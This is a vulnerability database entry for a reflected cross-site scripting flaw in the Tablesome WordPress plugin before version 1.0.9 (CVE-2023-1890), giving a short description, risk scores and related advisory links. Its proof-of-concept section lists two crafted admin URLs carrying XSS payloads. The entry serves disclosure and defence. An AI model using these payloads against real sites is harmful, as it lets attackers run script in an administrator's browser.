Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbTaurus OmarWPVDB-ID:8EF64490-30CD-4E07-9B7C-64F551944F3D
HistoryApr 24, 2023 - 12:00 a.m.

Tablesome < 1.0.9 - Reflected XSS

2023-04-2400:00:00
Taurus Omar
wpscan.com
7
plugin vulnerability
reflected xss
url handling
admin role
security notice

EPSS

0.003

Percentile

70.9%

JSON

The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting

PoC

Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yet https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&amp;a;">'><details%2Fopen%2Fontoggle%3Dconfirm('XSS')> https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&amp;tablesome;_feature_notice_dismissed=1&alert(/XSS/)

Related

wpexploit 1
cve 1
packetstorm 1
cvelist 1
nuclei 1
prion 1
nvd 1
wpexploit
wpexploit
Tablesome < 1.0.9 - Reflected XSS
2023-04-24 00:00:00
cve
cve
CVE-2023-1890
2023-05-15 13:15:10
packetstorm
packetstorm
WordPress Tablesome Cross Site Scripting
2023-07-25 00:00:00
cvelist
cvelist
CVE-2023-1890 Tablesome < 1.0.9 - Reflected XSS
2023-05-15 12:15:41
nuclei
nuclei
Tablesome < 1.0.9 - Cross-Site Scripting
2023-07-07 09:38:49
prion
prion
Cross site scripting
2023-05-15 13:15:00
nvd
nvd
CVE-2023-1890
2023-05-15 13:15:10

EPSS

0.003

Percentile

70.9%

JSON
Related for WPVDB-ID:8EF64490-30CD-4E07-9B7C-64F551944F3D
wpexploit1cve1packetstorm1cvelist1nuclei1prion1nvd1